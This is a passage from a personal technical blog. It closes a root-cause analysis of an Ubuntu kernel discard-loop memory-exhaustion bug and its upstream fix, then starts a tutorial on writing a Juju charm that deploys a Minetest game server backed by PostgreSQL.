important part, <code class="language-plaintext highlighter-rouge">nr_sects</code> is only decremented in one place, by <code class="language-plaintext highlighter-rouge">req_sects</code>,
which if 0, would lead to the infinite loop condition.</p>
<p>Now, since <code class="language-plaintext highlighter-rouge">req_sects</code> is initially equal to <code class="language-plaintext highlighter-rouge">nr_sects</code>, the loop would never be
entered in the first place if <code class="language-plaintext highlighter-rouge">nr_sects</code> is 0.</p>
<p>This is where the second commit, “block: make sure discard bio is aligned with
logical block size” comes in.</p>
<p>This commit adds a line to the above loop, to allow <code class="language-plaintext highlighter-rouge">req_sects</code> to be set to a
new value:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">__blkdev_issue_discard</span><span class="p">(...,</span> <span class="n">sector_t</span> <span class="n">nr_sects</span><span class="p">,</span> <span class="p">...)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="k">while</span> <span class="p">(</span><span class="n">nr_sects</span><span class="p">)</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">req_sects</span> <span class="o">=</span> <span class="n">nr_sects</span><span class="p">;</span>
<span class="n">sector_t</span> <span class="n">end_sect</span><span class="p">;</span>
<span class="n">req_sects</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">req_sects</span><span class="p">,</span> <span class="n">bio_allowed_max_sectors</span><span class="p">(</span><span class="n">q</span><span class="p">));</span>
<span class="n">end_sect</span> <span class="o">=</span> <span class="n">sector</span> <span class="o">+</span> <span class="n">req_sects</span><span class="p">;</span>
<span class="p">...</span>
<span class="n">nr_sects</span> <span class="o">-=</span> <span class="n">req_sects</span><span class="p">;</span>
<span class="n">sector</span> <span class="o">=</span> <span class="n">end_sect</span><span class="p">;</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We see that <code class="language-plaintext highlighter-rouge">req_sects</code> will now be the minimum of itself and
<code class="language-plaintext highlighter-rouge">bio_allowed_max_sectors(q)</code>, a new function introduced by the same commit.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="nf">bio_allowed_max_sectors</span><span class="p">(</span><span class="k">struct</span> <span class="n">request_queue</span> <span class="o">*</span><span class="n">q</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">round_down</span><span class="p">(</span><span class="n">UINT_MAX</span><span class="p">,</span> <span class="n">queue_logical_block_size</span><span class="p">(</span><span class="n">q</span><span class="p">))</span> <span class="o">>></span> <span class="mi">9</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">queue_logical_block_size(q)</code> queries the hardware for the logical block size of
the underlying device.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="nf">queue_logical_block_size</span><span class="p">(</span><span class="k">struct</span> <span class="n">request_queue</span> <span class="o">*</span><span class="n">q</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">retval</span> <span class="o">=</span> <span class="mi">512</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">q</span> <span class="o">&&</span> <span class="n">q</span><span class="o">-></span><span class="n">limits</span><span class="p">.</span><span class="n">logical_block_size</span><span class="p">)</span>
<span class="n">retval</span> <span class="o">=</span> <span class="n">q</span><span class="o">-></span><span class="n">limits</span><span class="p">.</span><span class="n">logical_block_size</span><span class="p">;</span>
<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>If <code class="language-plaintext highlighter-rouge">q->limits.logical_block_size</code> is 512 or smaller, then bit shifted right by 9
yields 0.</p>
<p><code class="language-plaintext highlighter-rouge">bio_allowed_max_sectors()</code> will return 0, and the min with <code class="language-plaintext highlighter-rouge">req_sects == nr_sects</code>
will favour the new 0.</p>
<p>This causes <code class="language-plaintext highlighter-rouge">nr_sects</code> to never be decremented since <code class="language-plaintext highlighter-rouge">req_sects</code> is 0, and
<code class="language-plaintext highlighter-rouge">req_sects</code> will never change since the <code class="language-plaintext highlighter-rouge">min()</code> that takes in itself will always
favour the 0.</p>
<p>From there the infinite loop iterates and fills up the <code class="language-plaintext highlighter-rouge">kmalloc-256</code> slab with
newly created bio entries, until all memory is exhausted and the OOM reaper
comes out and starts killing processes, which is ineffective since this is a
kernel memory leak.</p>
<h1 id="finding-the-commit-with-the-fix">Finding the Commit With the Fix</h1>
<p>The fix comes in the form of:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit: b88aef36b87c9787a4db724923ec4f57dfd513f3
ubuntu-bionic: a55264933f12c2fdc28a66841c4724021e8c1caf
Author: Mikulas Patocka <mpatocka@redhat.com>
Date: Tue Jul 3 13:34:22 2018 -0400
Subject: block: fix infinite loop if the device loses discard capability
BugLink: https://bugs.launchpad.net/bugs/1837257
</code></pre></div></div>
<p>You can read it here:</p>
<ul>
<li><a href="/assets/bin/block_fix_infinite_loop.txt">block: fix infinite loop if the device loses discard capability</a></li>
</ul>
<p>This adds a check right after the <code class="language-plaintext highlighter-rouge">min(req_sects, bio_allowed_max_sectors(q));</code>
to test if <code class="language-plaintext highlighter-rouge">req_sects</code> has been set to 0, and if it has, to exit the loop and
move into failure handling:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="n">req_sects</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">req_sects</span><span class="p">,</span> <span class="n">bio_allowed_max_sectors</span><span class="p">(</span><span class="n">q</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">req_sects</span><span class="p">)</span>
<span class="k">goto</span> <span class="n">fail</span><span class="p">;</span>
<span class="p">...</span>
</code></pre></div></div>
<p>From there things work as normal. As “block: fix infinite loop if the device
loses discard capability” points out, all of this is triggered due to a race
where if underlying device is reloaded with a metadata table that doesn’t
support the discard operation, then <code class="language-plaintext highlighter-rouge">q->limits.max_discard_sectors</code> is set to 0
and has a knock on effect of setting <code class="language-plaintext highlighter-rouge">q->limits.logical_block_size</code> to strange
values and leads to the infinite loop and out of memory condition.</p>
<h1 id="landing-the-fix-in-the-kernel">Landing the Fix in the Kernel</h1>
<p>As with all kernel bugs, we need to follow the <a href="https://wiki.ubuntu.com/StableReleaseUpdates">Stable Release
Updates</a> procedure, and follow the
special <a href="https://wiki.ubuntu.com/KernelTeam/KernelUpdates">kernel specific rules</a>.</p>
<p>This involves opening a launchpad bug and filling out a SRU template:</p>
<ul>
<li><a href="https://bugs.launchpad.net/bugs/1842271">https://bugs.launchpad.net/bugs/1842271</a></li>
</ul>
<p>For this particular SRU I got lucky, since “block: fix infinite loop if the
device loses discard capability” was already pulled in from a upstream -stable
release and already applied to master-next via:</p>
<ul>
<li><a href="https://bugs.launchpad.net/bugs/1837257">https://bugs.launchpad.net/bugs/1837257</a></li>
</ul>
<p>So I did not need to submit any patches to the Ubuntu kernel mailing list. Poor
me haha. Don’t worry, there’s always next time.</p>
<p>The commit made its way into 4.15.0-59-generic and was eventually released as
4.15.0-60-generic. If you are using this kernel or newer, you will be running
a fixed kernel and you will not see this issue.</p>
<h1 id="conclusion">Conclusion</h1>
<p>There you have it. We reproduced and determined the root cause of a runaway
kernel memory allocation that consumed the entire system memory, and made sure
it got fixed in the next kernel update.</p>
<p>This case was an excellent example of when to use <code class="language-plaintext highlighter-rouge">git bisect</code>, since we had
everything required for it to be an effective tool for this situation.</p>
<p>We had a close analysis of the code and managed to determine exactly what caused
the infinite loop to occur, and how the fix holds up. I’m pretty happy with how
this got resolved, even if <code class="language-plaintext highlighter-rouge">git bisect</code> is a little bland compared to other more
exotic bug finding tools.</p>
<p>I hope you enjoyed the read, and as always, feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellAs mentioned previously, I will write about particularly interesting cases I have worked from start to completion from time to time on this blog. This is another of those cases. Today, we are going to look at a case where creating a seemingly innocent RAID array triggers a kernel bug which causes the system to allocate all of its memory and subsequently crash. Let’s start digging into this and get this fixed.Learning How to Write Juju Charms by Creating a Minetest Charm2019-12-02T00:00:00+00:002019-12-02T00:00:00+00:00https://ruffell.nz/programming/writeups/2019/12/02/learning-how-to-write-juju-charms-by-creating-a-minetest-charm<p>In my <a href="https://ruffell.nz/programming/writeups/2019/08/26/getting-started-with-juju-to-deploy-and-scale-software.html">previous blog post about Juju</a>,
a tool which lets you deploy and scale software easily, we learned what Juju
is, how to deploy some common software packages, debug them, and scale them.</p>
<p>Juju deploys <em>Charms</em>, a set of instructions on how to install, configure and
scale a particular software package. To be able to deploy software as a Charm,
a Charm has to be written first. Usually Charms are written by experts in
operating that software package, so that the Charm represents the best way to
configure and tune that application. But what happens if no Charm exists for
something you want to deploy?</p>
<p><img src="/assets/images/2019_268.png" alt="hero" /></p>
<p>Today we are going to learn how to write our own Charms using the original Charm
writing method, by making a Charm for the <a href="https://www.minetest.net/">Minetest</a>
game server. So fire up your favourite text editor, and lets get started.</p>
<!--more-->
<h1 id="what-do-we-want-to-deploy">What Do We Want to Deploy?</h1>
<p>Before we start writing our Charm, we need to collect a list of requirements and
things we want to build into our Charm.</p>
<p>We are going to deploying a server for <a href="https://www.minetest.net/">Minetest</a>,
which is an open source voxel game engine which implements different sub-games.
Minetest is pretty much the open source alternative for Minecraft.</p>
<p><img src="/assets/images/2019_269.png" alt="minetest" /></p>
<p>Minetest is written mostly in C++ and Lua, so it has excellent performance, and
the game is designed to be modded. There are also a ton of configuration options
that can be tweaked, so we can build those things into our Charm.</p>
<p>To make things a little more interesting than a basic single application Charm,
I see that Minetest supports <a href="https://wiki.minetest.net/Database_backends#PostgreSQL">PostgreSQL as a database backend</a>.</p>
<p>PostgreSQL in Minetest offers performance improvements over using the default
SQLite3 DB, as well as offering the ability to store multiple Minetest “worlds”
in the same PostgreSQL database instance.</p>
<p>So our requirements for our Minetest Charm will be:</p>
<ul>
<li>To deploy minetest-server.</li>
<li>To be able to edit and set minetest-server configuration variables.</li>
<li>To use PostgreSQL as a database backend.</li>
</ul>
<p>Lets get started.</p>
<h1 id="original-charms-vs-reactive-charms">Original Charms Vs Reactive Charms</h1>
<p>There are several methods to write Charms, and each method has evolved over time
with different major versions of Juju.</p>
<p>The original method of writing Charms was introduced in Juju 1.0, and while
simple, they had the downside of not being able to know anything about a
deployments state. Reactive Charms solve this problem, by storing and managing
state, but it also required a fundamental change in how Charms are written.</p>
<p>There are a lot of Charms out there, some use the older original method, and
others have been upgraded or written in the reactive method. Since both methods
are still widespread, and it is likely that Charms written in both methods will
need to be maintained into the future, I will eventually cover both methods.
For now, we will tackle learning the original method in this blog post.</p>
<h1 id="original-charm-writing-method">Original Charm Writing Method</h1>
<p>I’m more or less going to be following along on the <a href="https://discourse.jujucharms.com/t/writing-your-first-juju-charm/1046">Juju documentation</a>
for the first generation charms.</p>
<h2 id="create-charm-directory-structure">Create Charm Directory Structure</h2>
<p>Charms are more or less a collection of text files, which makes writing and
modifying them very straightforward.</p>
<p>We will start by making a directory for our charms to live in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cd ~
$ mkdir charms
$ cd charms
</code></pre></div></div>
<p>From there, a Charm is the collection of text files inside a directory, so we
will make the directory structure we need:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir minetest-server
$ cd minetest-server
$ touch README metadata.yaml config.yaml copyright icon.svg revision
$ mkdir hooks
$ cd hooks
$ touch start stop install db-relation-changed config-changed
</code></pre></div></div>
<p>Your directory structure should now look like this:</p>
<p><img src="/assets/images/2019_271.png" alt="directory" /></p>
<h2 id="edit-the-readme-file">Edit the README File</h2>
<p>All Charms need a README file, where we document what the Charm does, how to
deploy it, and what its configuration options are.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Minetest is a fun, free and open source voxel game inspired by Minecraft.
It supports various game modes, like survival and creative, and many more can
be added with mods.
This Charm deploys a basic game server, and is backed by a PostgreSQL database
for maximum performance. There are no mods, so you will need to add them
yourself.
To deploy:
$ juju bootstrap
$ juju deploy postgresql
$ juju deploy minetest-server
$ juju expose minetest-server
</code></pre></div></div>
<h2 id="edit-the-revision-file">Edit the revision File</h2>
<p>The revision file keeps track of the Charm version. We are going to keep this
simple, by saying that this is the first version:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1
</code></pre></div></div>
<h2 id="create-the-metadatayaml-file">Create the metadata.yaml File</h2>
<p>The <code class="language-plaintext highlighter-rouge">metadata.yaml</code> file tells Juju what this Charm is for, and what relations
this Charm is capable of. It also contains important information such as the
description, maintainer and so on.</p>
<p>The first part is straightforward:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>name: minetest-server
summary: Minetest is a opensource voxel game designed to be modded.
maintainer: Matthew Ruffell <matthew.ruffell@canonical.com>
description: |
Minetest is a fun, opensource voxel game engine that can be customised with
different game modes and mods.
This charm installs Minetest with a PostgreSQL backend.
tags:
- social
series:
- eoan
- bionic
</code></pre></div></div>
<p>The next part involves describing the relations which this Charm provides. We
need to list the relation type (provides, requires or peers), the name of the
relation, and the interface type.</p>
<p>We have two relations. We provide one, Minetest, and require one,
PostgreSQL.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>provides:
server:
interface: minetest
requires:
db:
interface: postgresql
</code></pre></div></div>
<p>We don’t need a peers section, because Minetest is not designed for clustering,
and all players must connect to the same server instance. Minetest is not
designed to scale unfortunately.</p>
<p>Putting it all together, we have a fully made <code class="language-plaintext highlighter-rouge">metadata.yaml</code> file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>name: minetest-server
summary: Minetest is a opensource voxel game designed to be modded.
maintainer: Matthew Ruffell <matthew.ruffell@canonical.com>
description: |
Minetest is a fun, opensource voxel game engine that can be customised with
different game modes and mods.
This charm installs Minetest with a PostgreSQL backend.
tags:
- social
series:
- eoan
- bionic
provides:
server:
interface: minetest
requires:
db:
interface: pgsql
</code></pre></div></div>
<h2 id="describe-configuration-options-in-configyaml">Describe Configuration Options in config.yaml</h2>
<p>Since we want users of our Charm to be able to configure the Minetest server
to suit their needs, such as changing the server message of the day, or the port
it is being served on, we need to define configuration variables in <code class="language-plaintext highlighter-rouge">config.yaml</code>.</p>
<p>This is also pretty straightforward.</p>
<p>The only thing to note is you should carefully consider what options you want to
expose to your users. Users don’t really care about the fine details, so only
expose what most people will understand and use.</p>
<p>Saying that, make sure you set sensible defaults. All Charms should work out of
the box on first deployment. If people are interested in changing config, they
will, otherwise they will leave everything alone.</p>
<p>An example config is: (inspired by the existing config.yaml in <a href="https://api.jujucharms.com/charmstore/v5/~jamestait/precise/minetest-server-2/archive/config.yaml">James Tait’s
older minetest charm</a>)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>options:
port:
default: 30000
description: Server port to listen on
type: int
server-name:
default: "Minetest server"
description: Name of the server
type: string
server-description:
default: "Juju deployed Minetest server"
description: Description of server
type: string
motd:
default: "Welcome!"
description: Message of the day
type: string
strict-protocol-version-checking:
default: "false"
description: Set to true to disallow old clients from connecting
type: string
creative-mode:
default: "false"
description: Set to true to enable creative mode (unlimited inventory)
type: string
enable-damage:
default: "false"
description: Enable players getting damage and dying
type: string
default-password:
default: ""
description: New users need to input this password
type: string
default-privs:
default: "build,shout"
description: |
Available privileges: build, shout, teleport, settime, privs, ban
See /privs in game for a full list on your server and mod configuration
type: string
enable-pvp:
default: "true"
description: Whether to enable players killing each other
type: string
</code></pre></div></div>
<h2 id="set-the-copyright-of-the-charm">Set the Copyright of the Charm</h2>
<p>All Charms should include a copyright file, which includes details about the
copyright and licensing status of the files inside the Charm.</p>
<p>Initially I was unsure what to place in the file, so I asked around my team.
The answer I got was that the Charm archive format does not specify a specific
way to license an application, so most Charms follow the <a href="https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/">debian/copyright
file format</a>.</p>
<p>We will take the <a href="https://github.com/openstack/charm-interface-keystone/blob/master/copyright">OpenStack Keystone Charm copyright</a>
file as inspiration, so the below will do:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0
Files: *
Copyright: 2019, Matthew Ruffell.
License: GPL-3
License: GPL-3
This package is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
.
This package is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.
You should have received a copy of the GNU General Public License
along with this package; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
.
On Debian systems, the complete text of the GNU General
Public License can be found in `/usr/share/common-licenses/GPL-3'.
</code></pre></div></div>
<h2 id="make-an-icon-for-the-charm-store">Make an Icon for the Charm Store</h2>
<p>If you want your Charm to look nice on the Charm store listing or on the Juju
GUI, then you should probably set an icon.</p>
<p>We can use the Charms tools package to generate us a basic icon which we can
then customise.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo snap install charm --classic
$ cd ~/charms/minetest-server
$ charm add icon
</code></pre></div></div>
<p>From there, open up <code class="language-plaintext highlighter-rouge">icon.svg</code> in Inkscape or whatever vector editor you like,
and make a nice icon:</p>
<p><img src="/assets/images/2019_276.png" alt="icon" /></p>
<p>I used the icon found at <code class="language-plaintext highlighter-rouge">/usr/share/icons/hicolor/scalable/apps/minetest.svg</code>
to make this icon.</p>
<h2 id="write-hooks">Write Hooks</h2>
<p>Hooks are executable files which perform the actual work of installing and
maintaining the Charm. Hooks are called by Juju at specific times when each hook
is required. For example, the “install” hook is called when the Charm is being
deployed, and it is responsible for installing the software to the machine.</p>
<p>Lets implement some hooks.</p>
<h3 id="start-hook">‘start’ Hook</h3>
<p>We will begin with the “start” hook. We are going to make our Minetest server a
systemd service, so all this needs to do is start the service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
set -e
status=$(status-get)
if [ $status = "active" ]
then
juju-log "Starting Minetest Server"
systemctl restart minetest
fi
if [ $status != "active" ]
then
juju-log "Minetest is not ready to start. Charm is not in active state."
fi
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">set -e</code> command tells Juju that if any command returns a non zero exit code,
indicating failure, the script will stop and raise an error, which Juju will
then communicate to its operator.</p>
<p>We use <code class="language-plaintext highlighter-rouge">systemctl restart</code> over <code class="language-plaintext highlighter-rouge">systemctl start</code> due to wanting our hooks to be
“idempotent”, which means the operation can be repeated many times without
changing the intended result. If we try and start an already running service,
we might error out and cause problems. Restart will down the service and get it
back up again, and hopefully reload config changes and the like.</p>
<h3 id="stop-hook">‘stop’ Hook</h3>
<p>The “stop” hook is similar to “start”, and just needs to stop the service.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
set -e
juju-log "Stopping Minetest Server"
systemctl stop minetest
</code></pre></div></div>
<h3 id="install-hook">‘install’ Hook</h3>
<p>The “install” hook needs to install Minetest, and also install the systemd
service files.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
set -e
juju-log "Installing Minetest from repos"
apt-get -y -qq install minetest
if ! getent group minetest > /dev/null ; then
juju-log "Adding minetest group"
addgroup --system minetest > /dev/null
fi
if ! getent passwd minetest > /dev/null ; then
juju-log "Adding minetest user"
adduser --system --home /home/minetest --ingroup minetest --gecos "Minetest server" minetest > /dev/null
fi
juju-log "Setting up configuration file"
mkdir -p /home/minetest/.minetest/worlds/world
cat > /home/minetest/.minetest/worlds/world/world.mt << EOF
port = 30000
server_name = Minetest server
server_description = Juju deployed Minetest server
motd = Welcome!
strict_protocol_version_checking = false
creative_mode = false
enable_damage = false
default_password =
default_privs = build,shout
enable_pvp = true
gameid = minetest
EOF
chown -R minetest:minetest /home/minetest/.minetest/
juju-log "Installing Minetest systemd service"
cat > /etc/systemd/system/minetest.service << EOF
[Unit]
Description=Minetest
Documentation=https://wiki.minetest.net/Main_Page
[Service]
Type=simple
User=minetest
ExecStart=/usr/games/minetest --server
ExecStop=/bin/kill -2 $MAINPID
[Install]
WantedBy=multi-user.target
EOF
juju-log "Enabling Minetest service"
systemctl enable minetest
status-set blocked "Waiting for database connection"
</code></pre></div></div>
<p>Notice the use of <code class="language-plaintext highlighter-rouge">status-set blocked</code>? We did that to tell Juju that we need
extra things in order to continue. In this case, we need a database, and for the
<code class="language-plaintext highlighter-rouge">db-relation-changed</code> hook to be executed before we can keep going.</p>
<p><code class="language-plaintext highlighter-rouge">status-set</code> changes the status displayed by Juju status and <code class="language-plaintext highlighter-rouge">blocked</code> is pretty
self explanatory.</p>
<h3 id="db-relation-changed-hook">‘db-relation-changed’ Hook</h3>
<p>Now that our install is waiting on a database connection, we had better sort
out what happens when we connect our database via a relation. In this case, we
want to populate our <code class="language-plaintext highlighter-rouge">world.mt</code> file, with database credentials and such.</p>
<p>We can do that with the <code class="language-plaintext highlighter-rouge">db-relation-changed</code> hook:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/bash
set -e
status-set maintenance "Configuring the database"
db_user=$(relation-get user)
db_database=$(relation-get database)
db_pass=$(relation-get password)
db_host=$(relation-get private-address)
db_port=5432
if [ -z "$db_user" ]; then
juju-log "No database information sent yet. Silently exiting"
exit 0
fi
juju-log "Got database credentials. Making new database"
cat >> /home/minetest/.minetest/worlds/world/world.mt << EOF
backend = postgresql
player_backend = postgresql
auth_backend = sqlite3
pgsql_connection = host=$db_host port=$db_port user=$db_user password=$db_pass dbname=$db_database
pgsql_player_connection = host=$db_host port=$db_port user=$db_user password=$db_pass dbname=$db_database
EOF
juju-log "Starting Minetest service"
systemctl restart minetest
status-set active
</code></pre></div></div>
<p>Charms need to communicate over their relations to exchange important data. For
our <code class="language-plaintext highlighter-rouge">db-relation-changed</code> hook, we want to talk to the PostgreSQL Charm to obtain
database credentials that Minetest will use to connect and access the database.</p>
<p>We can do that with the hook tools <code class="language-plaintext highlighter-rouge">relation-get</code> to obtain variables, and
<code class="language-plaintext highlighter-rouge">relation-set</code> to send variables to the other Charm.</p>
<p>We used <code class="language-plaintext highlighter-rouge">relation-get user</code> to fetch the username, and <code class="language-plaintext highlighter-rouge">relation-get password</code>
for the database user’s password. These are all randomly generated when we
add the relation, so we can’t just hardcode these values.</p>
<h3 id="config-changed-hook">‘config-changed’ Hook</h3>
<p>The <code class="language-plaintext highlighter-rouge">config-changed</code> hook reacts to any changes made to the Charms configuration,
and writes those changes to the backing configuration file, and normally makes
an attempt at restarting the underlying service.</p>
<p>We can use the hook tool <code class="language-plaintext highlighter-rouge">config-get</code> to query the current value of a
configuration setting, and set it into the file with <code class="language-plaintext highlighter-rouge">sed</code> commands. The
<code class="language-plaintext highlighter-rouge">config-changed</code> hook in <a href="https://api.jujucharms.com/charmstore/v5/~jamestait/precise/minetest-server-2/archive/hooks/config-changed">James Tait’s older minetest charm</a>
does this very well.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/bin/sh
CONFIG_FILE=/home/minetest/.minetest/worlds/world/world.mt
PORT=`config-get port`
if [ ! -z "$PORT" ]; then
sed -i -e "s/^port \= .*/port \= ${PORT}/" $CONFIG_FILE
fi
open-port $PORT/udp
SERVER_NAME=`config-get server-name`
if [ ! -z "$SERVER_NAME" ]; then
sed -i -e "s/^server_name \= .*/server_name \= ${SERVER_NAME}/" $CONFIG_FILE
fi
DESCRIPTION=`config-get description`
if [ ! -z "$DESCRIPTION" ]; then
sed -i -e "s/^server_description \= .*/server_description \= ${DESCRIPTION}/" $CONFIG_FILE
fi
MOTD=`config-get motd`
if [ ! -z "$MOTD" ]; then
sed -i -e "s/^motd \= .*/motd \= ${MOTD}/" $CONFIG_FILE
fi
STRICT_PROTOCOL_VERSION_CHECKING=`config-get strict-protocol-version-checking`
if [ ! -z "$STRICT_PROTO_VERSION" ]; then
sed -i -e "s/^strict_protocol_version_checking \= .*/strict_protocol_version_checking \= ${STRICT_PROTOCOL_VERSION_CHECKING}/" $CONFIG_FILE
fi
CREATIVE_MODE=`config-get creative-mode`
if [ ! -z "$CREATIVE_MODE" ]; then
sed -i -e "s/^creative_mode \= .*/creative_mode \= ${CREATIVE_MODE}/" $CONFIG_FILE
fi
ENABLE_DAMAGE=`config-get enable-damage`
if [ ! -z "$ENABLE_DAMAGE" ]; then
sed -i -e "s/^enable_damage \= .*/enable_damage \= ${ENABLE_DAMAGE}/" $CONFIG_FILE
fi
DEFAULT_PASSWORD=`config-get default-password`
if [ ! -z "$DEFAULT_PASSWORD" ]; then
sed -i -e "s/^default_password \= .*/default_password \= ${DEFAULT_PASSWORD}/" $CONFIG_FILE
fi
DEFAULT_PRIVS=`config-get default-privs`
if [ ! -z "$DEFAULT_PRIVS" ]; then
sed -i -e "s/^default_privs \= .*/default_privs \= ${DEFAULT_PRIVS}/" $CONFIG_FILE
fi
ENABLE_PVP=`config-get enable-pvp`
if [ ! -z "$ENABLE_PVP" ]; then
sed -i -e "s/^enable_pvp \= .*/enable_pvp \= ${ENABLE_PVP}/" $CONFIG_FILE
fi
</code></pre></div></div>
<p>The more interesting part of the hook is right at the top with the <code class="language-plaintext highlighter-rouge">open-port</code>
hook tool. Since we can change what port the server binds to, we need to be able
to tell Juju what port to expose to the user. <code class="language-plaintext highlighter-rouge">open-port</code> does exactly this.</p>
<h3 id="mark-all-hooks-as-executable">Mark All Hooks as Executable</h3>
<p>All hook files need to be executable, so we need to ensure they are marked as
such. Do a quick <code class="language-plaintext highlighter-rouge">chmod</code> over the contents of the <code class="language-plaintext highlighter-rouge">hooks</code> directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ chmod +x ~/charms/minetest-server/hooks/*
</code></pre></div></div>
<h2 id="deploying-the-charm">Deploying the Charm</h2>
<p>Now that we have our Charm written, we need to test it to ensure it works, and
debug it if it doesn’t. To do that, we are going to deploy it under debug mode
and keep track of its progress.</p>
<h3 id="make-a-juju-controller">Make a Juju Controller</h3>
<p>Since this is Juju, we need to have a controller running if we don’t already
have one configured. We are going to use LXD as our backing cloud to keep this
easy.</p>
<p>I’m going to make my controller use eoan as the operating system, so I will set
<code class="language-plaintext highlighter-rouge">--bootstrap-series=eoan</code> when creating the controller.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju bootstrap --bootstrap-series=eoan localhost lxd-controller
Creating Juju controller "lxd-controller" on localhost/localhost
Looking for packaged Juju agent version 2.7.0 for amd64
To configure your system to better support LXD containers, please see: https://github.com/lxc/lxd/blob/master/doc/production-setup.md
Launching controller instance(s) on localhost/localhost...
- juju-9fba67-0 (arch=amd64)
Installing Juju agent on bootstrap instance
Fetching Juju GUI 2.15.0
Waiting for address
Attempting to connect to 10.72.102.88:22
Connected to 10.72.102.88
Running machine configuration script...
Host key fingerprint is SHA256:WWJ5Rrtbd0pNIPgNX1DYpuBq1PcnipRpiqIAVNKYMko
+---[RSA 2048]----+
| .+. ... o=.|
|oEo. o..o...+|
|+o + =+ = +.|
|o . *..+ =o |
|. S..+..o.o|
|. Bo o.oo|
|. . =.. ....|
| . . . . . . |
| .. . |
+----[SHA256]-----+
Bootstrap agent now started
Contacting Juju controller at 10.72.102.88 to verify accessibility...
Bootstrap complete, controller "lxd-controller" now is available
Controller machines are in the "controller" model
Initial model "default" added
</code></pre></div></div>
<p>After that, we can check the status of <code class="language-plaintext highlighter-rouge">juju controllers</code> to make sure our
controller has been registered correctly:</p>
<p><img src="/assets/images/2019_272.png" alt="controller" /></p>
<p>Since we now have an active controller, we can also query <code class="language-plaintext highlighter-rouge">juju status</code> which
should be empty:</p>
<p><img src="/assets/images/2019_273.png" alt="status" /></p>
<h3 id="deploy-the-postgresql-charm">Deploy the PostgreSQL Charm</h3>
<p>Our Minetest Charm depends on the PostgreSQL charm, so we will go ahead and
deploy that first.</p>
<p>Searching the <a href="https://jaas.ai">Charm Store</a> brings us to the <a href="https://jaas.ai/postgresql/199">PostgreSQL Charm</a>,
which we can deploy with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju deploy postgresql
</code></pre></div></div>
<p>This gives us a single standalone PostgreSQL instance. The Charm supports
clustering and such, but we won’t go to such efforts for our little Minetest
world.</p>
<p>From there Juju will go and create a new bionic container and install PostgreSQL.</p>
<p>We can check <code class="language-plaintext highlighter-rouge">juju status</code> to keep tabs on progress.</p>
<p><img src="/assets/images/2019_274.png" alt="status" /></p>
<h3 id="deploy-the-minetest-charm">Deploy the Minetest Charm</h3>
<p>Here comes the moment of truth. Let’s deploy our Minetest Charm!</p>
<p>Firstly, in case this goes horribly, we will watch the debug logs. Open up a
terminal tab and run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju debug-log
</code></pre></div></div>
<p>This lets us follow along on a very low level what Juju is doing.</p>
<p>We can deploy our local charm by simply referencing the directory it lives in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ juju deploy ~/charms/minetest-server --series eoan
